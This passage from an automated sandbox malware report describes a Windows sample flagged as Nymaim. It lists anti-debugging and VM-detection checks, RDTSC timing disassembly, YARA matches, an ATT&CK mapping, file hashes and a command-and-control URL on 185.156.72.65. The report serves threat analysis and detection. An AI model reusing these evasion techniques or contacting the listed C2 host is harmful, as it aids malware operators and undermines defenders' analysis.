                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0069D second address: 4A006CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F7E2CC83CA0h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov bl, 67h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0092A second address: 4A0097B instructions: 0x00000000 rdtsc 0x00000002 mov esi, 6F537B49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a call 00007F7E2CD3B845h 0x0000000f pop esi 0x00000010 pop ebx 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 pushad 0x00000014 mov eax, 4CFC5229h 0x00000019 mov bx, si 0x0000001c popad 0x0000001d push eax 0x0000001e jmp 00007F7E2CD3B83Bh 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F7E2CD3B845h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0097B second address: 4A00981 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00981 second address: 4A00985 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00985 second address: 4A009B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F7E2CC83C9Fh 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7E2CC83CA5h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A009B6 second address: 4A009C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CD3B83Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0A4E second address: 49D0A61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83C9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0957 second address: 49D095B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D095B second address: 49D0961 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0961 second address: 49D0967 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0967 second address: 49D096B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1001E second address: 4A10026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, bx 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10026 second address: 4A1002C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1002C second address: 4A10030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10030 second address: 4A10034 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10034 second address: 4A100D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b mov ecx, ebx 0x0000000d mov bl, 50h 0x0000000f popad 0x00000010 pushfd 0x00000011 jmp 00007F7E2CD3B83Eh 0x00000016 sbb cl, FFFFFFB8h 0x00000019 jmp 00007F7E2CD3B83Bh 0x0000001e popfd 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F7E2CD3B83Bh 0x00000028 adc ecx, 7DD6657Eh 0x0000002e jmp 00007F7E2CD3B849h 0x00000033 popfd 0x00000034 popad 0x00000035 mov ebp, esp 0x00000037 pushad 0x00000038 mov cx, 9563h 0x0000003c pushad 0x0000003d mov cx, 0ED5h 0x00000041 call 00007F7E2CD3B842h 0x00000046 pop esi 0x00000047 popad 0x00000048 popad 0x00000049 and esp, FFFFFFF8h 0x0000004c jmp 00007F7E2CD3B841h 0x00000051 xchg eax, ecx 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F7E2CD3B83Dh 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A100D7 second address: 4A10159 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F7E2CC83CA1h 0x0000000f xchg eax, ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F7E2CC83CA3h 0x00000019 xor si, FFAEh 0x0000001e jmp 00007F7E2CC83CA9h 0x00000023 popfd 0x00000024 pushfd 0x00000025 jmp 00007F7E2CC83CA0h 0x0000002a sbb esi, 1BC07128h 0x00000030 jmp 00007F7E2CC83C9Bh 0x00000035 popfd 0x00000036 popad 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10159 second address: 4A1016F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 mov dh, BEh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx ebx, ax 0x00000012 movzx eax, di 0x00000015 popad 0x00000016 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 473CC4 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 61359F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 61394F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 622734 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 698728 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00474058 rdtsc 0_2_00474058
                Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 1430Jump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow / User API: threadDelayed 1304Jump to behavior
                Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.4 %
                Source: C:\Users\user\Desktop\file.exe TID: 2164Thread sleep count: 68 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 2164Thread sleep time: -136068s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 2556Thread sleep count: 1430 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 2556Thread sleep time: -2861430s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1240Thread sleep count: 92 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1240Thread sleep count: 51 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 1892Thread sleep time: -32000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 2104Thread sleep count: 1304 > 30Jump to behavior
                Source: C:\Users\user\Desktop\file.exe TID: 2104Thread sleep time: -2609304s >= -30000sJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00417727 FindFirstFileExW,0_2_00417727
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0494798E FindFirstFileExW,0_2_0494798E
                Source: file.exe, file.exe, 00000000.00000002.4514188391.00000000005F2000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.4516328047.0000000005260000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4514605892.00000000009ED000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4514605892.0000000000A18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.4514188391.00000000005F2000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Found potential dummy code loops (likely to delay analysis)
                Source: C:\Users\user\Desktop\file.exeProcess Stats: CPU usage > 42% for more than 60s
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00474058 rdtsc 0_2_00474058
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040CDE3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402A50 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402A50
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04787D41 push dword ptr fs:[00000030h]0_2_04787D41
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04930D90 mov eax, dword ptr fs:[00000030h]0_2_04930D90
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0493092B mov eax, dword ptr fs:[00000030h]0_2_0493092B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00418592 GetProcessHeap,0_2_00418592
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00409A2A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00409A2A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040CDE3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A58A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040A58A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A720 SetUnhandledExceptionFilter,0_2_0040A720
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04939C91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_04939C91
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0493A7F1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0493A7F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0493D04A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0493D04A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0493A987 SetUnhandledExceptionFilter,0_2_0493A987
                Source: file.exe, file.exe, 00000000.00000002.4514188391.00000000005F2000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 3Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040A2EC cpuid 0_2_0040A2EC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00410822 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_00410822

                Stealing of Sensitive Information

                barindex
                Yara detected Nymaim
                Source: Yara matchFile source: 0.3.file.exe.4a20000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.4930e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2080963099.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		1
                Process Injection                		341
                Virtualization/Sandbox Evasion                		OS Credential Dumping1
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading                		1
                Process Injection                		LSASS Memory771
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information                		Security Account Manager341
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive1
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information                		NTDS3
                Process Discovery                		Distributed Component Object ModelInput Capture11
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing                		LSA Secrets1
                Application Window Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials1
                File and Directory Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync213
                System Information Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe32%ReversingLabsWin32.Infostealer.Tinba
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub4100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubes100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubR100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub2100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubgs2100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubB100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubk100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub)100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub7-2476756634-1003100%Avira URL Cloudmalware
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubl100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubfalse
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubesfile.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub4file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub2file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubRfile.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubrfile.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubgs2file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosublfile.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubkfile.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub)file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubBfile.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubbfile.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub7-2476756634-1003file.exe, 00000000.00000002.4514605892.0000000000A00000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      185.156.72.65
                      		unknownRussian Federation
                      		44636ITDELUXE-ASRUtrue

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1565650
                      Start date and time:2024-11-30 13:09:07 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 6m 59s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:4
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:file.exe
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:Failed
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Override analysis time to 240s for sample files taking high CPU consumption

                      Warnings

                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • VT rate limit hit for: file.exe

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      07:10:31API Interceptor13139211x Sleep call for process: file.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      185.156.72.65file.exeGet hashmaliciousNymaimBrowse
                      • 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                      file.exeGet hashmaliciousAmadey, NymaimBrowse
                      • 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                      file.exeGet hashmaliciousNymaimBrowse
                      • 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                      file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                      • 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
                      file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                      • 185.156.72.65/soft/download
                      file.exeGet hashmaliciousNymaimBrowse
                      • 185.156.72.65/soft/download
                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                      • 185.156.72.65/files/download
                      file.exeGet hashmaliciousNymaimBrowse
                      • 185.156.72.65/soft/download
                      file.exeGet hashmaliciousNymaimBrowse
                      • 185.156.72.65/soft/download
                      file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, XmrigBrowse
                      • 185.156.72.65/files/download

                      Domains

                      No context

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      ITDELUXE-ASRUfile.exeGet hashmaliciousNymaimBrowse
                      • 185.156.72.65
                      file.exeGet hashmaliciousAmadey, NymaimBrowse
                      • 185.156.72.65
                      file.exeGet hashmaliciousNymaimBrowse
                      • 185.156.72.65
                      file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                      • 185.156.72.65
                      file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, StealcBrowse
                      • 185.156.72.65
                      file.exeGet hashmaliciousNymaimBrowse
                      • 185.156.72.65
                      file.exeGet hashmaliciousNymaimBrowse
                      • 185.156.72.65
                      file.exeGet hashmaliciousNymaimBrowse
                      • 185.156.72.65
                      file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, Nymaim, XmrigBrowse
                      • 185.156.72.65
                      file.exeGet hashmaliciousNymaimBrowse
                      • 185.156.72.65

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      No created / dropped files found

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.94693550831142
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:file.exe
                      File size:1'991'168 bytes
                      MD5:bd23f2ee2aea0a9c0464bc44292485fc
                      SHA1:35b9012235c5a7c3094fc87f5a54fc542e8b78ab
                      SHA256:28c26c34bdb7a826385868133025f41dcb9f5313bb26d1a2ef365d3a9f913bd3
                      SHA512:0ad0d81347acb18661d4d8b13ea6edfc39b1cf5690c8ee85b6cfe1cf40a91084fd70fd503cf2cf937307f2c7a16a386442b52b207f3202e27dfd8de9edbee905
                      SSDEEP:49152:rutpGoG8L/bDG2x7Q+cn32w2iNL2A4vyrWnPOuk4FkQe:rmGObDG2x7Q+c9NG6in1NkQ
                      TLSH:4F9533EA7E536438C5B9343F153F0A2D3FFF9EACA58703AC084246790AB3175D9465A2
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........RC..<...<...<.......<.......<.......<..~G...<...=.3.<.......<.......<.......<.Rich..<.........PE..L....[.d.................|.

                      File Icon

                      Icon Hash:cfa99b8a8651798d

                      Static PE Info

                      General

                      Entrypoint:0x8a5000
                      Entrypoint Section:.taggant
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:TERMINAL_SERVER_AWARE
                      Time Stamp:0x64C65B18 [Sun Jul 30 12:44:08 2023 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:0
                      File Version Major:5
                      File Version Minor:0
                      Subsystem Version Major:5
                      Subsystem Version Minor:0
                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                      Entrypoint Preview

                      Instruction
                      jmp 00007F7E2CC607AAh
                      cmovo ebx, dword ptr [esi]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add cl, ch
                      add byte ptr [eax], ah
                      add byte ptr [eax], al
                      add byte ptr [esi], al
                      add byte ptr [eax], 00000000h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add al, 0Ah
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      or ecx, dword ptr [edx]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      or dword ptr [eax+00000000h], eax
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
